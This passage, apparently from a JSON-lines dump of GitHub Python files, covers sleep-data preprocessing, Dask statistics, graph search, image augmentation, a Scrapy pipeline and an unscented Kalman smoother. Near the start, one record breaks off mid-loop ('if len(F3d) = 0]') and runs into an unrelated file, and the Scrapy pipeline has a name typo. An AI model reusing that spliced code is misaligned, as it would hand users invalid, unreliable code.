ACC_max_date) & (SleepL[\"timedelta\"]> HR_min_date) & (SleepL[\"timedelta\"] < HR_max_date) &(SleepL[\"timedelta\"]> Slp_min_date) & (SleepL[\"timedelta\"] < Slp_max_date)]\n\n# print(\"-----before convert datetime and round and average to 1s-----\")\n# print(ACC_new)\n\n\n# ------------ Rounding ACC (Rounding to 1 sec) -------------------------------\n# Convert to datetime and round to second,\nACC_new['timedelta'] = pd.DataFrame(pd.to_timedelta(ACC_new['timedelta'], 'seconds').round('1s'))\n\ndf_acc_X = ACC_new.groupby('timedelta')['accX'].mean()\ndf_acc_Y = ACC_new.groupby('timedelta')['accY'].mean()\ndf_acc_Z = ACC_new.groupby('timedelta')['accZ'].mean()\n\nACC_new2 = pd.concat([df_acc_X, df_acc_Y, df_acc_Z], axis=1)\nACC_new2 = ACC_new2.reset_index()\nACC_new2['timedelta'] = ACC_new2['timedelta'] - ACC_new2['timedelta'].min()\n\n# print(\"-----after convert datetime and round and average to 1s-----\")\n# print(ACC_new2)\n\n# ------------ Rounding Heart Rate (Rounding to 1 sec) -------------------------------\nHeartR_new['timedelta'] = pd.DataFrame(pd.to_timedelta(HeartR_new['timedelta'],'seconds').round('1s'))\n# Resampling every 1s with median with ffill\nresample_rule = '1s'\nHeartR_new2 = HeartR_new.set_index('timedelta').resample(resample_rule,).median().ffill()\nHeartR_new2 = HeartR_new2.reset_index()\nHeartR_new2['timedelta'] = HeartR_new2['timedelta'] - HeartR_new2['timedelta'].min()\n\n\n# ------------ Rounding Sleep Label (Rounding to 1 sec) -------------------------------\nSleepL_new['timedelta'] = pd.DataFrame(pd.to_timedelta(SleepL_new['timedelta'],'seconds').round('1s'))\n# Resampling every 1s with median with ffill\nresample_rule = '1s'\nSleepL_new2 = SleepL_new.set_index('timedelta').resample(resample_rule,).median().ffill()\nSleepL_new2 = SleepL_new2.reset_index()\nSleepL_new2['timedelta'] = SleepL_new2['timedelta'] - SleepL_new2['timedelta'].min()\n\nSleepL_new2.replace({-1:0},inplace=True)\nSleepL_new2['sleep'].fillna(0)\n\n#8.1E merge all data\ndf = []\ndf = pd.merge_asof(ACC_new2,HeartR_new2,on='timedelta',direction='nearest')\ndf = pd.merge_asof(df, SleepL_new2, on = 'timedelta',direction='nearest')\n\nHeartR_new2['heartrate'].fillna(HeartR_new2.median())\n\n\ndf.drop(columns = ['timedelta'],inplace = True)\n# print(df)\n# Standardized data\nfeature_columns = ['accX', 'accY', 'accZ', 'heartrate']\nlabel_columns = ['sleep']\n\n\n# Standardized data\nstandard_scaler = StandardScaler()\nfeature_columns = ['accX', 'accY', 'accZ', 'heartrate']\nlabel_columns = ['sleep']\ndf_feature = df[feature_columns] #standardized data of df_feature\ndf_feature = pd.DataFrame(standard_scaler.fit_transform(df_feature.values),index = df_feature.index,columns=df_feature.columns)\n# print(df_feature)\ndf_label = df[label_columns]\n# print(\"df_label\")\n# print(df_label)\n# Visualize signals\n# df_feature.plot()\n# plt.show()\n# df_label.plot()\n# plt.show()\n\n# ------------ 1D to 3D feature-------------------------------\n# set sliding window parameter\nslidingW = 100\nStride_step = 5\nn_features = 4 #number of colums form df_feature\ndf_feature3D = np.array([],ndmin=2)\ndf_label_new = np.array([])\n\nfor t in range(0 , len(df_feature), Stride_step ):\n F3d = np.array(df_feature[t:t+slidingW],ndmin=2)\n # print(F3d[0])\n if len(F3d) = 0]\n return df\n\n# takes two pandas.DataFrame with columns: cluster, gene, sum\n# aggregates along cluster/gene, adding sums together\ndef combine_chunk_statistics(df1, df2):\n return pandas.concat([df1, df2]).groupby(['cluster', 'gene']).sum().reset_index()\n\n\n# takes xarray.Dataset, returns pandas.DataFrame wrapped in dask.delayed()\ndef delayed_chunk_statistics(ds, chunk_index):\n da = ds.X.data\n chunk = da.blocks[chunk_index]\n offset = [a*b for (a,b) in zip(chunk_index, da.chunksize)]\n # metadata objects to pass in to chunk_statistics (methods called via\n # dask.delayed(...) are not supposed to access any global state)\n cluster_ids = ds.cluster[offset[0]:offset[0]+chunk.shape[0]]\n genes = ds.gene[offset[1]:offset[1]+chunk.shape[1]]\n return dask.delayed(chunk_statistics)(chunk, cluster_ids, genes)\n\n\n# takes a list of pandas.DataFrame wrapped in dask.delayed\n# returns a single dask.delayed pandas.DataFrame with the full statistics\ndef combine_delayed_results(results):\n def pairs(xs):\n for i in range(0, len(xs), 2):\n yield xs[i:i+2]\n if len(results) == 0:\n return None # shouldn't happen...\n elif len(results) == 1:\n return results[0]\n else:\n new_results = []\n for pair in pairs(results):\n if len(pair) == 2:\n new_results.append(dask.delayed(combine_chunk_statistics)(pair[0], pair[1]))\n elif len(pair) == 1:\n new_results.append(dask.delayed(pair[0]))\n return combine_delayed_results(new_results)\n\n\n# Dask requires wrapping in a __name__ == '__main__' check\n# in order to use the distributed client locally\nif __name__ == '__main__':\n args = ARG_PARSER.parse_args()\n input_file = args.dataset[0].rstrip(os.sep)\n directory = os.path.dirname(input_file)\n base_name = \".\".join(os.path.basename(input_file).split('.')[0:-1])\n output_file = os.path.join(directory, base_name + '.cl-stats.parquet')\n\n with AutoDaskCluster(args.cluster) as cluster, dask.distributed.Client(cluster) as client:\n logging.info(\"Dashboard link: %s\" % client.dashboard_link)\n\n logging.info(\"Loading %s\" % input_file)\n data = xarray.open_zarr(input_file)\n\n if args.persist:\n logging.info(\"Persisting data into cluster memory...\")\n data = data.persist()\n dask.distributed.wait(data)\n logging.info(\"Finished persisting data\")\n\n logging.info(\"Computing statistics\")\n\n da = data.X.data # access underlying dask array directly\n delayed_results = []\n\n for inds in itertools.product(*map(range, da.blocks.shape)):\n delayed_results.append(delayed_chunk_statistics(data, inds))\n\n results = combine_delayed_results(delayed_results)\n\n if args.visualize:\n logging.info(\"Saving task graph: %s\" % TASK_GRAPH_FILE)\n dask.visualize(results, filename=TASK_GRAPH_FILE)\n\n results = results.compute()\n\n logging.info(\"Finished computing statistics, writing to %s\" % output_file)\n results.to_parquet(output_file)\n","repo_name":"danielford/AllenInstituteSandbox","sub_path":"cluster-stats-delayed.py","file_name":"cluster-stats-delayed.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"14807463164","text":"import random\nimport numpy as np\nimport heapdict\nimport sys\nfrom Clases.Arista import Arista\n\n\nclass Grafo(object):\n \n def __init__(self, id='grafo', dirigido=False):\n self.id = id\n self.dirigido = dirigido\n self.V = dict()\n self.E = dict()\n self.attr = dict()\n\n def __repr__(self):\n \n return str(\"id: \" + str(self.id) + '\\n'\n + 'nodos: ' + str(self.V.values()) + '\\n'\n + 'aristas: ' + str(self.E.values()))\n\n def add_nodo(self, nodo):\n \n self.V[nodo.id] = nodo\n\n def add_arista(self, arista):\n \n if self.get_arista(arista.id):\n return False\n\n self.E[arista.id] = arista\n return True\n\n def get_arista(self, arista_id):\n \n if self.dirigido:\n return arista_id in self.E\n else:\n u, v = arista_id\n return (u, v) in self.E or (v, u) in self.E\n\n\n #Proyecto 3 generar pesos \n def generar_pesos(self):\n for arista in self.E.values():\n arista.attrs['peso'] = random.randint(1, 50)\n\n\n def to_graphviz(self, filename):\n \n edge_connector = \"--\"\n graph_directive = \"graph\"\n if self.dirigido:\n edge_connector = \"->\"\n graph_directive = \"digraph\"\n\n with open(filename, 'w') as f:\n f.write(f\"{graph_directive} {self.id} \" + \" {\\n\")\n for nodo in self.V:\n if \"Dijkstra\" in self.id:\n f.write(f\"\\\"{nodo} ({self.V[nodo].attrs['dist']})\\\";\\n\")\n else:\n f.write(f\"{nodo};\\n\")\n for arista in self.E.values():\n if \"Dijkstra\" in self.id:\n peso = np.abs(self.V[arista.u.id].attrs['dist']\n - self.V[arista.v.id].attrs['dist'])\n f.write(f\"\\\"{arista.u} ({self.V[arista.u.id].attrs['dist']})\\\"\"\n + f\" {edge_connector} \"\n + f\"\\\"{arista.v} ({self.V[arista.v.id].attrs['dist']})\\\"\"\n + f\";\\n\")\n else:\n f.write(f\"{arista.u} {edge_connector} {arista.v};\\n\")\n f.write(\"}\")\n\n#PROYECTO 2\n def BFS(self, s):\n if not s.id in self.V:\n print(\"Error, nodo no encontrado\", file=sys.stderr)\n exit(-1)\n\n bfs = Grafo(id=f\"BFS_{self.id}\", dirigido=self.dirigido)\n discovered = set()\n bfs.add_nodo(s)\n L0 = [s]\n discovered = set()\n added = [s.id]\n\n while True:\n L1 = []\n for node in L0:\n aristas = [ids_arista for ids_arista in self.E\n if node.id in ids_arista]\n\n for arista in aristas:\n v = arista[1] if node.id == arista[0] else arista[0]\n\n if v in discovered:\n continue\n\n bfs.add_nodo(self.V[v])\n bfs.add_arista(self.E[arista])\n discovered.add(v)\n L1.append(self.V[v])\n\n L0 = L1\n if not L0:\n break\n\n return bfs\n\n def DFS_R(self, u):\n \n dfs = Grafo(id=f\"DFS_R_{self.id}\", dirigido=self.dirigido)\n discovered = set()\n self.DFS_rec(u, dfs, discovered)\n\n return dfs\n\n def DFS_rec(self, u, dfs, discovered):\n \n dfs.add_nodo(u)\n discovered.add(u.id)\n aristas = (arista for arista in self.E if u.id in arista)\n\n for arista in aristas:\n v = arista[1]\n if not self.dirigido:\n v = arista[0] if u.id == arista[1] else arista[1]\n if v in discovered:\n continue\n dfs.add_arista(self.E[arista])\n self.DFS_rec(self.V[v], dfs, discovered)\n\n def DFS_I(self, s):\n dfs = Grafo(id=f\"DFS_I_{self.id}\", dirigido=self.dirigido)\n discovered = {s.id}\n dfs.add_nodo(s)\n u = s.id\n frontera = []\n while True:\n aristas = (arista for arista in self.E if u in arista)\n for arista in aristas:\n v = arista[1] if u == arista[0] else arista[0]\n if v not in discovered:\n frontera.append((u, v))\n\n # si se encuentra vacía romper el while\n if not frontera:\n break\n\n parent, child = frontera.pop()\n \n if child not in discovered:\n dfs.add_nodo(self.V[child])\n arista = Arista(self.V[parent], self.V[child])\n dfs.add_arista(arista)\n discovered.add(child)\n\n u = child\n\n return dfs\n\n#proyecto 3\n def Dijkstra(self, s):\n tree = Grafo(id=f\"{self.id}_Dijkstra\")\n line = heapdict.heapdict()\n parents = dict()\n in_tree = set()\n\n\n \n line[s] = 0\n parents[s] = None\n for node in self.V:\n if node == s:\n continue\n line[node] = np.inf\n parents[node] = None\n\n while line:\n u, u_dist = line.popitem()\n if u_dist == np.inf:\n continue\n\n self.V[u].attrs['dist'] = u_dist\n tree.add_nodo(self.V[u])\n if parents[u] is not None:\n arista = Arista(self.V[parents[u]], self.V[u])\n tree.add_arista(arista)\n in_tree.add(u)\n\n # get neighbor nodes\n neigh = []\n for arista in self.E:\n if self.V[u].id in arista:\n v = arista[0] if self.V[u].id == arista[1] else arista[1]\n if v not in in_tree:\n neigh.append(v)\n\n # actualizar distancias de ser necesario\n for v in neigh:\n arista = (u, v) if (u, v) in self.E else (v, u)\n if line[v] > u_dist + self.E[arista].attrs['peso']:\n line[v] = u_dist + self.E[arista].attrs['peso']\n parents[v] = u\n\n return tree\n","repo_name":"fsociety42/Argenis_Hernandez_Proyecto_3","sub_path":"Clases/Grafo.py","file_name":"Grafo.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70277344052","text":"import imgaug.augmenters as iaa\nfrom scipy.ndimage import affine_transform\nfrom tqdm import tqdm_notebook as tqdm\nimport numpy as np\n\nimport albumentations as aug\nfrom imgaug import augmenters as iaa\nimport imgaug as ia\nimport cv2\nimport os\nimport numpy as np\nimport random\nimport skimage\nimport math\n#===================================================paug===============================================================\ndef order_points(pts):\n # initialzie a list of coordinates that will be ordered\n # such that the first entry in the list is the top-left,\n # the second entry is the top-right, the third is the\n # bottom-right, and the fourth is the bottom-left\n rect = np.zeros((4, 2), dtype=\"float32\")\n # the top-left point will have the smallest sum, whereas\n # the bottom-right point will have the largest sum\n s = pts.sum(axis=1)\n rect[0] = pts[np.argmin(s)]\n rect[2] = pts[np.argmax(s)]\n # now, compute the difference between the points, the\n # top-right point will have the smallest difference,\n # whereas the bottom-left will have the largest difference\n diff = np.diff(pts, axis=1)\n rect[1] = pts[np.argmin(diff)]\n rect[3] = pts[np.argmax(diff)]\n # return the ordered coordinates\n return rect\n\ndef four_point_transform(image, pts):\n # obtain a consistent order of the points and unpack them\n # individually\n rect = order_points(pts)\n original = np.array([[0, 0],\n [image.shape[1] - 1, 0],\n [image.shape[1] - 1, image.shape[0] - 1],\n [0, image.shape[0] - 1]], dtype=\"float32\")\n M = cv2.getPerspectiveTransform(original, rect)\n warped = cv2.warpPerspective(image, M, (image.shape[1], image.shape[0]))\n return warped\n\ndef Perspective_aug(img, threshold1 = 0.25, threshold2 = 0.75):\n # img = cv2.imread(img_name)\n rows, cols, ch = img.shape\n\n x0,y0 = random.randint(0, int(cols * threshold1)), random.randint(0, int(rows * threshold1))\n x1,y1 = random.randint(int(cols * threshold2), cols - 1), random.randint(0, int(rows * threshold1))\n x2,y2 = random.randint(int(cols * threshold2), cols - 1), random.randint(int(rows * threshold2), rows - 1)\n x3,y3 = random.randint(0, int(cols * threshold1)), random.randint(int(rows * threshold2), rows - 1)\n pts = np.float32([(x0,y0),\n (x1,y1),\n (x2,y2),\n (x3,y3)])\n\n warped = four_point_transform(img, pts)\n\n x_ = np.asarray([x0, x1, x2, x3])\n y_ = np.asarray([y0, y1, y2, y3])\n\n min_x = np.min(x_)\n max_x = np.max(x_)\n min_y = np.min(y_)\n max_y = np.max(y_)\n\n warped = warped[min_y:max_y,min_x:max_x,:]\n return warped\n\n#===================================================origin=============================================================\ndef aug_image(image):\n\n seq = iaa.Sequential([\n iaa.Fliplr(0.5),\n\n iaa.Affine(rotate= (-8, 8),\n shear = (-8, 8),\n mode='edge'),\n\n iaa.SomeOf((0, 2),\n [\n iaa.GaussianBlur((0, 0.3)),\n iaa.AdditiveGaussianNoise(loc=0, scale=(0.0, 0.01 * 255), per_channel=0.5),\n iaa.AddToHueAndSaturation((-5, 5)), # change hue and saturation\n iaa.PiecewiseAffine(scale=(0.01, 0.03)),\n iaa.PerspectiveTransform(scale=(0.01, 0.1)),\n iaa.JpegCompression(20, 40)\n ],\n random_order=True\n ),\n\n iaa.Cutout(nb_iterations=1, size=(0.02, 0.2), squared=False)\n ])\n\n image = seq.augment_image(image)\n return image\n\n#===================================================crop===============================================================\n# def get_cropped_img(image, bbox, is_mask=False):\n# crop_margin = 0.1 # 0.683 ratio\n\n# size_x = image.shape[1]\n# size_y = image.shape[0]\n\n# x0, y0, x1, y1 = bbox\n\n# dx = x1 - x0\n# dy = y1 - y0\n\n# x0 -= dx * crop_margin\n# x1 += dx * crop_margin + 1\n# y0 -= dy * crop_margin\n# y1 += dy * crop_margin + 1\n\n# if x0 < 0:\n# x0 = 0\n# if x1 > size_x:\n# x1 = size_x\n# if y0 < 0:\n# y0 = 0\n# if y1 > size_y:\n# y1 = size_y\n\n# if is_mask:\n# crop = image[int(y0):int(y1), int(x0):int(x1)]\n# else:\n# crop = image[int(y0):int(y1), int(x0):int(x1), :]\n\n# return crop\n\ndef get_cropped_img_fast(image, bbox):\n x0, y0, x1, y1 = bbox\n return image[y0:y1, x0:x1]\n\ndef get_center_aligned_img(crop_img, pt):\n x0, y0 = pt[2]\n x1, y1 = pt[7]\n\n x = int((x0 + x1) / 2.0)\n w = crop_img.shape[1]\n radius = max(x, w - x)\n s = radius - x\n fill = np.ones([crop_img.shape[0], radius * 2 + 1, 3]).astype(np.uint8) * 128\n\n if x < radius:\n fill[:, s:s + crop_img.shape[1], :] = crop_img\n else:\n fill[:, 0:crop_img.shape[1], :] = crop_img\n\n return fill\n\n\nclass RandomErasing(object):\n \"\"\" Randomly selects a rectangle region in an image and erases its pixels.\n 'Random Erasing Data Augmentation' by Zhong et al.\n See https://arxiv.org/pdf/1708.04896.pdf\n Args:\n probability: The probability that the Random Erasing operation will be performed.\n sl: Minimum proportion of erased area against input image.\n sh: Maximum proportion of erased area against input image.\n r1: Minimum aspect ratio of erased area.\n mean: Erasing value.\n \"\"\"\n\n def __init__(self, probability=0.5, sl=0.02, sh=0.4, r1=0.3, mean=(0.485, 0.456, 0.406)):\n self.probability = probability\n self.mean = mean\n self.sl = sl\n self.sh = sh\n self.r1 = r1\n\n def __call__(self, img):\n\n if random.uniform(0, 1) >= self.probability:\n return img\n\n for attempt in range(100):\n area = img.size()[1] * img.size()[2]\n\n target_area = random.uniform(self.sl, self.sh) * area\n aspect_ratio = random.uniform(self.r1, 1 / self.r1)\n\n h = int(round(math.sqrt(target_area * aspect_ratio)))\n w = int(round(math.sqrt(target_area / aspect_ratio)))\n\n if w < img.size()[2] and h < img.size()[1]:\n x1 = random.randint(0, img.size()[1] - h)\n y1 = random.randint(0, img.size()[2] - w)\n if img.size()[0] == 3:\n img[0, x1:x1 + h, y1:y1 + w] = self.mean[0]\n img[1, x1:x1 + h, y1:y1 + w] = self.mean[1]\n img[2, x1:x1 + h, y1:y1 + w] = self.mean[2]\n else:\n img[0, x1:x1 + h, y1:y1 + w] = self.mean[0]\n return img\n\n return img\n\n\ndef cutout(img, max_height, max_width, min_height=0, min_width=0, fill_value=114):\n img = img.copy()\n\n height, width = img.shape[:2]\n\n hole_height = random.randint(min_height, max_height)\n hole_width = random.randint(min_width, max_width)\n\n y1 = random.randint(0, height - hole_height)\n x1 = random.randint(0, width - hole_width)\n y2 = y1 + hole_height\n x2 = x1 + hole_width\n\n img[y1:y2, x1:x2] = fill_value\n return img\n\n\ndef random_affine(img, degrees=8, translate=.0625, scale=.1, shear=8, border=0):\n # torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))\n # https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4\n\n height = img.shape[0] + border * 2\n width = img.shape[1] + border * 2\n\n # Rotation and Scale\n R = np.eye(3)\n a = random.uniform(-degrees, degrees)\n # a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations\n s = random.uniform(1 - scale, 1 + scale)\n R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)\n\n # Translation\n T = np.eye(3)\n T[0, 2] = random.uniform(-translate, translate) * img.shape[0] + border # x translation (pixels)\n T[1, 2] = random.uniform(-translate, translate) * img.shape[1] + border # y translation (pixels)\n\n # Shear\n S = np.eye(3)\n S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)\n S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)\n\n # Combined rotation matrix\n M = S @ T @ R # ORDER IS IMPORTANT HERE!!\n if (border != 0) or (M != np.eye(3)).any(): # image changed\n img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))\n return img\n\n\ndef aug_medium(prob=1):\n return aug.Compose([\n aug.HorizontalFlip(p=.5),\n aug.OneOf([\n aug.CLAHE(clip_limit=2, p=.5),\n aug.IAASharpen(p=.25),\n ], p=0.35),\n aug.RandomBrightnessContrast(p=.7),\n aug.OneOf([\n aug.GaussNoise(p=.35),\n aug.ISONoise(p=.7),\n aug.ImageCompression(quality_lower=70, quality_upper=100, p=.7)\n ], p=.6),\n aug.RGBShift(p=.5),\n aug.HueSaturationValue(hue_shift_limit=8, sat_shift_limit=12, val_shift_limit=8, p=.5),\n aug.ToGray(p=.3)\n ], p=prob)","repo_name":"jihang-zhang/Tianchi-Taobao-clothes-retrieval","sub_path":"metric_sub/src_train/augmentation.py","file_name":"augmentation.py","file_ext":"py","file_size_in_byte":9232,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"21"} +{"seq_id":"29766520795","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\nfrom scrapy.exceptions import DropItem\n\n\nclass DuplicatesPipeline(object):\n def __init__(self):\n self.author_set = set()\n\n def process_item(self, item, spider):\n if item['author'] in self.anthor_set:\n raise DropItem(\"查找到重复姓名的项目:%s\"%item )\n else:\n self.author_set.add(item['author'])\n return item\n\n\nclass QidianHotPipeline:\n def process_item(self, item, spider):\n if item[\"form\"] == \"连载\":\n item[\"form\"] = \"LZ\"\n else:\n item[\"form\"] = \"WJ\"\n return item\n","repo_name":"schKatze/qidianhot","sub_path":"qidian_hot/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24314479912","text":"import numpy as np\nimport os\nimport pdb\nimport tensorflow as tf\nimport random\nimport tensorflow_probability as tfp\ntfd = tfp.distributions\ntfl = tf.linalg\nfrom copy import deepcopy\nimport tensorflow.contrib.eager as tfe\n\nclass ukss_model(object):\n\n def __init__(self, y_ph, a0, P0, k, parameters, update_fun=None,\n noise_state_dep=False, regression=False):\n\n self.y_ph = y_ph\n self.a0 = a0\n self.P0 = P0\n self.Nt = tf.shape(self.y_ph)[0]\n self.parameters = parameters\n self.m = tf.cast(tf.shape(self.a0)[0], tf.float32)\n self.k = tf.cast(k, tf.float32)\n self.regression = regression\n\n if update_fun is None:\n self.update_parameters = self.update_parameters_default\n else:\n self.update_parameters = update_fun\n\n self.make_initial_kalman_state()\n\n self.initial_smoother_state = (\n tf.zeros_like(self.a0), \n tf.zeros_like(self.P0),\n tf.zeros_like(self.P0)\n )\n\n self.noise_state_dep = noise_state_dep\n\n def make_initial_kalman_state(self):\n\n # initialize Kalman state\n a0 = self.a0\n Ht, Qt, Zt, Tt = self.parameters\n H, Q, Z, T = Ht(a0, 0), Qt(a0, 0), Zt(a0, 0), Tt(a0, 0)\n\n K = tf.ones([\n tf.shape(self.a0)[0], \n tf.shape(H)[0]\n ])\n\n v = tf.ones([\n tf.shape(H)[0],\n 1\n ])\n \n t0 = tf.constant(0)\n ll0 = tf.constant([[0.]])\n\n self.initial_kalman_state = (\n self.a0, self.P0, ll0, t0,\n v, self.a0, self.P0,\n self.a0, self.P0, self.P0\n )\n\n def make_sigma_points(self, m, at, Pt):\n \n try:\n Pts = tf.linalg.cholesky(Pt)\n except:\n pdb.set_trace()\n\n x0 = at\n x1 = at + Pts * tf.sqrt(\n tf.cast(m + self.k, tf.float32))\n x2 = at - Pts * tf.sqrt(\n tf.cast(m + self.k, tf.float32))\n X = tf.concat([x0, x1, x2], axis=1)\n\n w0 = tf.ones([1, 1]) * self.k / (m + self.k)\n w12 = tf.ones([1, 2 * m]) * 1 / (\n 2 * (m + self.k))\n\n W = tf.concat([w0, w12], axis=1)\n\n return X, W\n\n def get_uk_filter_step(self, params):\n \n def _uk_filter_step(kalman_state, y):\n\n '''\n Performs one Kalman filter step\n '''\n \n H, Q, Z, T = params\n \n a_prior, P_prior, ll, t, _, _, _, _, _, _ = kalman_state\n\n X, W = self.make_sigma_points(self.m, a_prior, P_prior)\n\n yb = tf.reduce_sum(\n Z(X, t) * W, axis=1, keepdims=True)\n u = Z(X, t) - yb\n v = y - yb\n\n P_av = tf.matmul(\n (X - a_prior) * W,\n u, transpose_b=True\n )\n\n if not self.noise_state_dep:\n Hx = H(a_prior, t)\n else:\n Hfun = lambda x : (x[1] * H(x[0][:, None], t), 0.)\n Heval = tf.map_fn(\n Hfun, (\n tf.transpose(X),\n tf.transpose(W)\n )\n )\n Hx = tf.reduce_sum(Heval[0], axis=0)\n\n P_vv = tf.matmul(\n u * W, u, transpose_b=True\n ) + Hx\n\n try:\n P_vv_inv = tf.linalg.inv(P_vv)\n except:\n pdb.set_trace()\n\n P_vv_inv = tf.linalg.inv(P_vv)\n\n apo = a_prior + tf.matmul(\n P_av, tf.matmul(\n P_vv_inv, v\n )\n )\n\n Ppo = P_prior - tf.matmul(\n P_av, tf.matmul(\n P_vv_inv, P_av,\n transpose_b=True\n )\n )\n\n Ppo = Ppo + 1e-4 * tf.eye(tf.shape(Ppo)[0])\n\n X, W = self.make_sigma_points(self.m, apo, Ppo)\n\n apr = tf.reduce_sum(\n T(X, t) * W, axis=1, keepdims=True\n )\n\n if not self.noise_state_dep:\n Qx = Q(a_prior, t)\n else:\n Qfun = lambda x : (x[1] * Q(x[0][:, None], t), 0.)\n Qeval = tf.map_fn(\n Qfun, (\n tf.transpose(X),\n tf.transpose(W)\n )\n )\n Qx = tf.reduce_sum(Qeval[0], axis=0)\n\n Ppr = tf.matmul(\n (T(X, t) - apr) * W, \n T(X, t) - apr, transpose_b=True\n ) + Qx\n\n Ppr = Ppr + 1e-4 * tf.eye(tf.shape(Ppr)[0])\n\n Ct1 = tf.matmul(\n (X - apo) * W,\n T(X, t) - apr, transpose_b=True\n )\n\n ll = - 0.5 * (\n tf.linalg.logdet(P_vv) + \n tf.matmul(v, tf.matmul(P_vv_inv, v), transpose_a=True)\n )\n \n t += 1\n\n return (apr, Ppr, ll, t, v, a_prior, P_prior, apo, Ppo, Ct1)\n \n return _uk_filter_step\n\n def run_kalman_filter(self, params):\n \n _uk_filter_step = self.get_uk_filter_step(params)\n \n self.filtered = tf.scan(\n _uk_filter_step, self.y_ph, self.initial_kalman_state\n )\n\n return self.filtered\n\n def get_kalman_smoother_step(self, params):\n\n def _kalman_smoother_step(smoother_state, filter_state):\n\n apr, Ppr, _, t, _, _, _, apo, Ppo, Ct1 = filter_state\n atp1_smooth, Ptp1_smooth, _ = smoother_state\n\n Ptp1_inv = tf.linalg.inv(Ppr)\n G = tf.matmul(Ct1, Ptp1_inv)\n \n if tf.math.equal(t, self.Nt):\n # deal with last step\n at_smooth = apo\n Pt_smooth = Ppo\n else:\n at_smooth = apo + tf.matmul(\n G, (atp1_smooth - apr)\n )\n Pt_smooth = Ppo + tf.matmul(\n G, tf.matmul(\n Ptp1_smooth - Ppr, G,\n transpose_b=True\n )\n )\n\n return (at_smooth, Pt_smooth, G)\n\n return _kalman_smoother_step\n \n def run_kalman_smoother(self, params):\n\n _ = self.run_kalman_filter(params)\n \n _kalman_smoother_step = self.get_kalman_smoother_step(params)\n \n self.smoothed = tf.scan(\n _kalman_smoother_step, self.filtered,\n self.initial_smoother_state, reverse=True\n )\n\n return self.smoothed\n\n def update_parameters_default(self, params):\n\n # This is just a default option\n\n _params = self.parameters\n _params[0] = tf.exp(params)\n\n return _params\n\n\n def numerical_gradients(self, params, dx=1e-4):\n \n _params_np = params.numpy()\n grads = []\n for i, p in enumerate(_params_np):\n _params_np_l = deepcopy(_params_np)\n _params_np_h = deepcopy(_params_np)\n\n _params_np_l[i] = p - dx\n _params_np_h[i] = p + dx\n loss_h = self.loss_eager(\n tf.constant(_params_np_h))\n loss_l = self.loss_eager(\n tf.constant(_params_np_l))\n\n grad = (loss_h - loss_l) / (2 * dx)\n grads.append(grad)\n\n return tf.stack(grads)\n\n def log_prob_eager(self, params, dx=1e-4):\n \n with tf.GradientTape(persistent=True) as tape:\n \n tape.watch(params)\n print(params)\n _params = self.update_parameters(params)\n\n _ = self.run_kalman_filter(_params)\n\n loss = - tf.reduce_mean(\n self.filtered[2]\n )\n \n print('loss = %s' % loss.numpy())\n\n grad = tape.gradient(loss, params)\n if (np.any(np.isnan(grad.numpy())) or \n np.any(np.abs(grad.numpy()) > 1e4)\n ): \n grad = self.numerical_gradients(params, dx=dx)\n \n print('Numerically estimating gradients')\n\n return loss, grad\n\n def loss_eager(self, params):\n\n _params = self.update_parameters(params)\n\n _ = self.run_kalman_filter(_params)\n\n loss = - tf.reduce_mean(\n self.filtered[2]\n )\n\n return loss\n\n def log_prob(self, params):\n\n _params = self.update_parameters(params)\n\n _ = self.run_kalman_filter(_params)\n\n loss = - tf.reduce_sum(\n self.filtered[2]\n )\n\n grad = tf.gradients(loss, params)[0]\n\n return loss, grad\n\n def approx_second_deriv(self, params_h, params_l, dx):\n \n _, grad_h = self.log_prob(params_h)\n _, grad_l = self.log_prob(params_l)\n\n d2Ldx2 = (grad_h - grad_l) / (2 * dx)\n\n return d2Ldx2\n\n def standard_errors(self, sess, fd, params, dx):\n\n sds = []\n\n for i, pa in enumerate(params):\n param_h = deepcopy(params)\n param_l = deepcopy(params)\n param_h[i] += dx\n param_l[i] -= dx\n\n d2Ldx2 = sess.run(\n self.approx_second_deriv(\n tf.constant(param_h),\n tf.constant(param_l), dx),\n feed_dict = fd\n )\n\n sd = 1. / np.sqrt(d2Ldx2[i])\n sds.append((pa, sd))\n\n return sds\n\n def fit(self, sess, fd, start, tolerance=1e-5,\n dx=1e-6, inital_inverse_hessian=None):\n\n optim_results = tfp.optimizer.bfgs_minimize(\n self.log_prob, initial_position=start,\n tolerance=tolerance,\n initial_inverse_hessian_estimate=inital_inverse_hessian)\n\n results = sess.run(optim_results, feed_dict=fd)\n\n assert(results.converged)\n print (\"Function evaluations: %d\" % results.num_objective_evaluations)\n\n sds = self.standard_errors(sess, fd, results.position, dx)\n\n return results, sds\n\n def expectation_step(self, params_current, pcross=None):\n\n _params_current = self.update_parameters(params_current)\n\n smoothed = self.run_kalman_smoother(_params_current)\n\n # Evaluate the Gaussian integrals with sigma point approximations\n a_smoothed = smoothed[0].numpy()\n P_smoothed = smoothed[1].numpy()\n G = smoothed[2].numpy()\n P_cross = []\n\n sig_points_transition = []\n for t in range(1, a_smoothed.shape[0]):\n mean_transition = tf.concat([a_smoothed[t, :, :], a_smoothed[t-1, :, :]], axis=0)\n if pcross is None:\n S1 = tf.concat([P_smoothed[t, :, :],\n tf.matmul(P_smoothed[t, :, :],\n G[t-1, :, :], transpose_b=True)], axis=1)\n S2 = tf.concat([tf.matmul(G[t-1, :, :],\n P_smoothed[t, 